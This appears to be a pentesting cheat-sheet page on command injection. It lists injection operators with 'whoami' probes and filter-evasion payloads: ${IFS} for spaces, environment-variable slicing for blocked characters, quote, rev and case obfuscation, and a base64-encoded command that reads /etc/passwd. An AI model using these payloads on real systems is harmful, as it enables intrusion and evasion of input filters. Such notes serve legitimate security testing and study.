Command Injection Testing

Parameter

Objective

-h or /?

What is the system output from using help menu commands?

;, ; echo whoami

Unix only; run echo after initial command

|, echo whoami|

Perl-specific injection to open files

||,

|| echo whoami

Run command if the initial command returns non-zero as the exit status

& , & echo whoami

Run initial command as background task and run next task immediately

&& , && echo whoami

Run if the initial command returns zero as the exit status

$(whoami)

Unix-only; Bash command execution

`whoami`

Unix only; using generic process substitution

>(whoami)

Unix only; using process substitution

Identifying Blacklisted Characters

Check in Burp with each Command Injection operators.

Bypassing Space Filters

# Add TAB
%09

# Add SPACE
${IFS}

# Add Brace Expresions
{ls,-al}

Bypassing Other Blacklisted Characters (Linux)

# Add /
${PATH:0:1}

# Add ;
${LS_COLORS:10:1}

# Character Shifting
man ascii (Find \) = 92 
$(tr '!-}' '"-~'<<<[)

Bypassing Other Blacklisted Characters (Windows)

# Add \
%HOMEPATH:~6,-11%
$env:HOMEPATH[0]

Bypassing Blacklisted Commands (Linux)

w'h'o'am'i
w"h"o"am"i
who$@ami
w\ho\am\i
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
$(a="WhOaMi";printf %s "${a,,}")
$(rev<<<'imaohw')
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)

PreviousWeb Tools NextJWTs and JSON

Last updated 1 year ago

hashtagIdentifying Blacklisted Characters

hashtagBypassing Space Filters

hashtagBypassing Other Blacklisted Characters (Linux)

hashtagBypassing Other Blacklisted Characters (Windows)

hashtagBypassing Blacklisted Commands (Linux)

Identifying Blacklisted Characters

Bypassing Space Filters

Bypassing Other Blacklisted Characters (Linux)

Bypassing Other Blacklisted Characters (Windows)

Bypassing Blacklisted Commands (Linux)